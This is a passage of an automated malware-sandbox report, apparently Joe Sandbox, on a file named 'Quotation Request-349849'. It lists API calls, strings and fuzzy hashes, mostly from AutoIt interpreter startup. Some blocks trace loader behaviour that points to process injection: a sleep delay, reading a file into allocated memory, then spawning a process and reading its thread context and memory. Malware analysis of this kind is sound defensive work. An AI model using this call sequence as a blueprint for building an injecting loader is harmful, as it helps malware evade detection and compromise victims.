                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00839511
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00839522
                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00839534
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                      • String ID:
                                                      • API String ID: 1500180987-0
                                                      • Opcode ID: 808d8231f15e521412b1828c139b18247055b423e76230aec229ada7a29209ff
                                                      • Instruction ID: 440a44be1bf92e077a298657676db57d682f6ac0bda022f8ff4a0614a33c95c1
                                                      • Opcode Fuzzy Hash: 808d8231f15e521412b1828c139b18247055b423e76230aec229ada7a29209ff
                                                      • Instruction Fuzzy Hash: 46C12BB1D0021DABDF21DF95CC85AEEB7B9FF85310F0040A6F609E6251DB749A848FA5

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 007D3074
                                                      • RegisterClassExW.USER32(00000030), ref: 007D309E
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007D30AF
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 007D30CC
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007D30DC
                                                      • LoadIconW.USER32(000000A9), ref: 007D30F2
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007D3101
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: 54943ba9fa86c84e4ac161e1b30f82ee503d292ba6e52dea8b836f33b7ccc238
                                                      • Instruction ID: af1198dc83f4f53ac5c6070f80c69e1a20d2c9aa8fcbdfa9cab8d91c8e787f96
                                                      • Opcode Fuzzy Hash: 54943ba9fa86c84e4ac161e1b30f82ee503d292ba6e52dea8b836f33b7ccc238
                                                      • Instruction Fuzzy Hash: 19310871805749AFDB029FA4EC89B9ABFF0FB09311F18416AE690EA2A1D3B90545CF51

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 007D3074
                                                      • RegisterClassExW.USER32(00000030), ref: 007D309E
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007D30AF
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 007D30CC
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007D30DC
                                                      • LoadIconW.USER32(000000A9), ref: 007D30F2
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007D3101
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: 63be0cf846c53a0db4ea659cdf1bdac0e15e3178513e1dc85ba3046d340626c9
                                                      • Instruction ID: 2cbfb19dc4eb925e0c9600b161ef5a022fda9144aa535d07e18cb7d63317d4d7
                                                      • Opcode Fuzzy Hash: 63be0cf846c53a0db4ea659cdf1bdac0e15e3178513e1dc85ba3046d340626c9
                                                      • Instruction Fuzzy Hash: 3F21C3B1911718AFDB01EFA4E889BDEBBF4FB08711F04412AFA11A62A1D7B54544CF91

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 007D4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008952F8,?,007D37AE,?), ref: 007D4724
                                                        • Part of subcall function 007F050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,007D7165), ref: 007F052D
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007D71A8
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0080E8C8
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0080E909
                                                      • RegCloseKey.ADVAPI32(?), ref: 0080E947
                                                      • _wcscat.LIBCMT ref: 0080E9A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                      • API String ID: 2673923337-2727554177
                                                      • Opcode ID: 28cd1cb1ddc39242ca5b997161db430fa32ec16969d5eb892ba4f9202670f0c1
                                                      • Instruction ID: 512b4e0124eab855b5c429451545784110c8d81b2ebe2c83a3f1c7dc7b31b349
                                                      • Opcode Fuzzy Hash: 28cd1cb1ddc39242ca5b997161db430fa32ec16969d5eb892ba4f9202670f0c1
                                                      • Instruction Fuzzy Hash: 9A717A71508301DEC304EFA9EC459ABBBB8FF84350B48092FF545C72A1EB759948CB92

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 007D3A50
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 007D3A5F
                                                      • LoadIconW.USER32(00000063), ref: 007D3A76
                                                      • LoadIconW.USER32(000000A4), ref: 007D3A88
                                                      • LoadIconW.USER32(000000A2), ref: 007D3A9A
                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 007D3AC0
                                                      • RegisterClassExW.USER32(?), ref: 007D3B16
                                                        • Part of subcall function 007D3041: GetSysColorBrush.USER32(0000000F), ref: 007D3074
                                                        • Part of subcall function 007D3041: RegisterClassExW.USER32(00000030), ref: 007D309E
                                                        • Part of subcall function 007D3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007D30AF
                                                        • Part of subcall function 007D3041: InitCommonControlsEx.COMCTL32(?), ref: 007D30CC
                                                        • Part of subcall function 007D3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007D30DC
                                                        • Part of subcall function 007D3041: LoadIconW.USER32(000000A9), ref: 007D30F2
                                                        • Part of subcall function 007D3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 007D3101
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: c1a64b1fa2a85bf891ea337c5b049300c7afa49cd88b0408323ce27ecb800e87
                                                      • Instruction ID: 657f5185e5b6d81cd0d977b5a95da35e950544971ace293d8515b50468c53809
                                                      • Opcode Fuzzy Hash: c1a64b1fa2a85bf891ea337c5b049300c7afa49cd88b0408323ce27ecb800e87
                                                      • Instruction Fuzzy Hash: A7212B71D00304AFEB12EFE4EC59B9D7BB5FB08711F14416BF604A62A1D3B956508F94

                                                      Control-flow Graph

                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 007D36D2
                                                      • KillTimer.USER32(?,00000001), ref: 007D36FC
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007D371F
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007D372A
                                                      • CreatePopupMenu.USER32 ref: 007D373E
                                                      • PostQuitMessage.USER32(00000000), ref: 007D374D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 129472671-2362178303
                                                      • Opcode ID: a1677c8cadc12d4f07c4e793a88b89879de62b21404814aeea29b2906a56cda3
                                                      • Instruction ID: a693d97c0998d44b745118e933f1cd9e6940ab0044dde10a76426e524792f128
                                                      • Opcode Fuzzy Hash: a1677c8cadc12d4f07c4e793a88b89879de62b21404814aeea29b2906a56cda3
                                                      • Instruction Fuzzy Hash: 2841F4B2200A45FBDB117FA8DC49B7A3B78FB04311F180127F602D63E2DA6D9A549763

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                      • API String ID: 1825951767-3513169116
                                                      • Opcode ID: 2c0504a359f4738913a3dfe87b3be8e2dcb39539c52446f9fb55ea856b6ebd75
                                                      • Instruction ID: 9aaa5bab50b41af6ac2b43c8119f7859cdb0dff06e09eeb0df4d1c032acd65ee
                                                      • Opcode Fuzzy Hash: 2c0504a359f4738913a3dfe87b3be8e2dcb39539c52446f9fb55ea856b6ebd75
                                                      • Instruction Fuzzy Hash: 1BA13D7191021DDACF05EBE4DC99AEEB779FF14310F48042AE515B7291EF786A08CB61

                                                      Control-flow Graph

                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 015EB949
                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 015EBB6F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1334107479.00000000015E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 015E9000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_15e9000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CreateFileFreeVirtual
                                                      • String ID:
                                                      • API String ID: 204039940-0
                                                      • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                      • Instruction ID: 55a6f01f8a722a5526df72233a54a779813dfe657819c1d9d378277706b3963a
                                                      • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                      • Instruction Fuzzy Hash: 51A10974E00209EBDF18CFA4C898BEEBBB5BF48306F108559E615BB281D7759A40CB55

                                                      Control-flow Graph

                                                      control_flow_graph 1073 7d39d5-7d3a45 CreateWindowExW * 2 ShowWindow * 2
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007D3A03
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007D3A24
                                                      • ShowWindow.USER32(00000000,?,?), ref: 007D3A38
                                                      • ShowWindow.USER32(00000000,?,?), ref: 007D3A41
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: 561c061b80a5ba0672228fb203e3c96bfdc152120c2a6e39e2d943fd2193f710
                                                      • Instruction ID: 9b37ce0ea63418d7b0576f689d4b0cbd1eb72b529a926bcb36bbbc5b442ddb84
                                                      • Opcode Fuzzy Hash: 561c061b80a5ba0672228fb203e3c96bfdc152120c2a6e39e2d943fd2193f710
                                                      • Instruction Fuzzy Hash: F1F03A705006907EEA3267A36C08E2B3E7DF7CAF51F04002ABA00A21B1C2651800CBB0

                                                      Control-flow Graph

                                                      control_flow_graph 1074 15eb648-15eb773 call 15e9298 call 15eb538 CreateFileW 1081 15eb77a-15eb78a 1074->1081 1082 15eb775 1074->1082 1085 15eb78c 1081->1085 1086 15eb791-15eb7ab VirtualAlloc 1081->1086 1083 15eb82a-15eb82f 1082->1083 1085->1083 1087 15eb7af-15eb7c6 ReadFile 1086->1087 1088 15eb7ad 1086->1088 1089 15eb7ca-15eb804 call 15eb578 call 15ea538 1087->1089 1090 15eb7c8 1087->1090 1088->1083 1095 15eb806-15eb81b call 15eb5c8 1089->1095 1096 15eb820-15eb828 ExitProcess 1089->1096 1090->1083 1095->1096 1096->1083
                                                      APIs
                                                        • Part of subcall function 015EB538: Sleep.KERNELBASE(000001F4), ref: 015EB549
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015EB769
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1334107479.00000000015E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 015E9000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_15e9000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CreateFileSleep
                                                      • String ID: GCAPARKFTQ5KP3FN
                                                      • API String ID: 2694422964-2222808206
                                                      • Opcode ID: 3f96f179646803efa3c72dfbbca67a9a919a1a9e35b17686cf933a8cf7304269
                                                      • Instruction ID: 8f4232f52b2b572385c0c981a2dac7d91e5ff47d07b034a85baf6dbfb74080e7
                                                      • Opcode Fuzzy Hash: 3f96f179646803efa3c72dfbbca67a9a919a1a9e35b17686cf933a8cf7304269
                                                      • Instruction Fuzzy Hash: 9F519230D04249DAEF15DBA4C858BEEBBB5BF58301F004198E209BB2C0D7B90B44CBA5

                                                      Control-flow Graph

                                                      control_flow_graph 1098 7d407c-7d4092 1099 7d416f-7d4173 1098->1099 1100 7d4098-7d40ad call 7d7a16 1098->1100 1103 80d3c8-80d3d7 LoadStringW 1100->1103 1104 7d40b3-7d40d3 call 7d7bcc 1100->1104 1107 80d3e2-80d3fa call 7d7b2e call 7d6fe3 1103->1107 1104->1107 1108 7d40d9-7d40dd 1104->1108 1118 7d40ed-7d416a call 7f2de0 call 7d454e call 7f2dbc Shell_NotifyIconW call 7d5904 1107->1118 1120 80d400-80d41e call 7d7cab call 7d6fe3 call 7d7cab 1107->1120 1110 7d4174-7d417d call 7d8047 1108->1110 1111 7d40e3-7d40e8 call 7d7b2e 1108->1111 1110->1118 1111->1118 1118->1099 1120->1118
                                                      APIs
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0080D3D7
                                                        • Part of subcall function 007D7BCC: _memmove.LIBCMT ref: 007D7C06
                                                      • _memset.LIBCMT ref: 007D40FC
                                                      • _wcscpy.LIBCMT ref: 007D4150
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007D4160
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                      • String ID: Line:
                                                      • API String ID: 3942752672-1585850449
                                                      • Opcode ID: 62b402d1fc96f42b229a21ebc38453e398186064bb68be105e157778606d950c
                                                      • Instruction ID: 5ae0a2a4e278a9d1d3e532a610d4bac63dc993c8c662b4100e36236c9ce960b6
                                                      • Opcode Fuzzy Hash: 62b402d1fc96f42b229a21ebc38453e398186064bb68be105e157778606d950c
                                                      • Instruction Fuzzy Hash: 41319071008704AFD765EBA0DC49BEB77ECBF44300F14451BF68592292EB78A648C796

                                                      Control-flow Graph

                                                      control_flow_graph 1133 7d686a-7d6891 call 7d4ddd 1136 80e031-80e041 call 83955b 1133->1136 1137 7d6897-7d68a5 call 7d4ddd 1133->1137 1140 80e046-80e048 1136->1140 1137->1136 1144 7d68ab-7d68b1 1137->1144 1142 80e067-80e0af call 7f0db6 1140->1142 1143 80e04a-80e04d call 7d4e4a 1140->1143 1154 80e0b1-80e0bb 1142->1154 1155 80e0d4 1142->1155 1147 80e052-80e061 call 8342f8 1143->1147 1144->1147 1148 7d68b7-7d68d9 call 7d6a8c 1144->1148 1147->1142 1157 80e0cf-80e0d0 1154->1157 1156 80e0d6-80e0e9 1155->1156 1160 80e260-80e263 call 7f2d55 1156->1160 1161 80e0ef 1156->1161 1158 80e0d2 1157->1158 1159 80e0bd-80e0cc 1157->1159 1158->1156 1159->1157 1164 80e268-80e271 call 7d4e4a 1160->1164 1163 80e0f6-80e0f9 call 7d7480 1161->1163 1167 80e0fe-80e120 call 7d5db2 call 8373e9 1163->1167 1170 80e273-80e283 call 7d7616 call 7d5d9b 1164->1170 1177 80e122-80e12f 1167->1177 1178 80e134-80e13e call 8373d3 1167->1178 1186 80e288-80e2b8 call 82f7a1 call 7f0e2c call 7f2d55 call 7d4e4a 1170->1186 1180 80e227-80e237 call 7d750f 1177->1180 1184 80e140-80e153 1178->1184 1185 80e158-80e162 call 8373bd 1178->1185 1180->1167 1190 80e23d-80e247 call 7d735d 1180->1190 1184->1180 1194 80e164-80e171 1185->1194 1195 80e176-80e180 call 7d5e2a 1185->1195 1186->1170 1197 80e24c-80e25a 1190->1197 1194->1180 1195->1180 1203 80e186-80e19e call 82f73d 1195->1203 1197->1160 1197->1163 1208 80e1a0-80e1bf call 7d7de1 call 7d5904 1203->1208 1209 80e1c1-80e1c4 1203->1209 1232 80e1e2-80e1f0 call 7d5db2 1208->1232 1210 80e1f2-80e1f5 1209->1210 1211 80e1c6-80e1e1 call 7d7de1 call 7d6839 call 7d5904 1209->1211 1215 80e215-80e218 call 83737f 1210->1215 1216 80e1f7-80e200 call 82f65e 1210->1216 1211->1232 1222 80e21d-80e226 call 7f0e2c 1215->1222 1216->1186 1225 80e206-80e210 call 7f0e2c 1216->1225 1222->1180 1225->1167 1232->1222
                                                      APIs
                                                        • Part of subcall function 007D4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007D4E0F
                                                      • _free.LIBCMT ref: 0080E263
                                                      • _free.LIBCMT ref: 0080E2AA
                                                        • Part of subcall function 007D6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 007D6BAD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                      • API String ID: 2861923089-1757145024
                                                      • Opcode ID: ad9f0c9a17d793e8d427d7d35c9c16a8dbd351804b81f611f661a85666865a44
                                                      • Instruction ID: 06dfae741f705a45a0a9e96f7901e9390026614616d643647964f4d12187ff66
                                                      • Opcode Fuzzy Hash: ad9f0c9a17d793e8d427d7d35c9c16a8dbd351804b81f611f661a85666865a44
                                                      • Instruction Fuzzy Hash: BB914A71A00219EFCF14EFA4CC959EEB7B9FF14314B14482AF915EB2A1DB74A905CB50
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007D35A1,SwapMouseButtons,00000004,?), ref: 007D35D4
                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007D35A1,SwapMouseButtons,00000004,?,?,?,?,007D2754), ref: 007D35F5
                                                      • RegCloseKey.KERNELBASE(00000000,?,?,007D35A1,SwapMouseButtons,00000004,?,?,?,?,007D2754), ref: 007D3617
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 3677997916-824357125
                                                      • Opcode ID: 39c7c643c4bad3e3f44a811c2efd3ba1a47194f8a272170eab879b59d9d7ed8f
                                                      • Instruction ID: 83b8e37d228e8c6ecc264d487ce41b7155355c5c4462a2f2482eeaa813947855
                                                      • Opcode Fuzzy Hash: 39c7c643c4bad3e3f44a811c2efd3ba1a47194f8a272170eab879b59d9d7ed8f
                                                      • Instruction Fuzzy Hash: 7F110375611218FADB208F64DC84EAABBB8EF04740F11856AB905D7210E6759E509BA2
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 015EACF3
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015EAD89
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015EADAB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1334107479.00000000015E9000.00000040.00000020.00020000.00000000.sdmp, Offset: 015E9000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_15e9000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                      • Instruction ID: 11bc68284a24067c08c7243d9a3c9dbc9226fac859ae82b7ddcb237057212ac4
                                                      • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                      • Instruction Fuzzy Hash: 4C621B30E142589BEB24CFA4C844BDEB7B2FF58301F1095A9D11DEB290E7769E80CB59
                                                      APIs
                                                        • Part of subcall function 007D4EE5: _fseek.LIBCMT ref: 007D4EFD
                                                        • Part of subcall function 00839734: _wcscmp.LIBCMT ref: 00839824
                                                        • Part of subcall function 00839734: _wcscmp.LIBCMT ref: 00839837
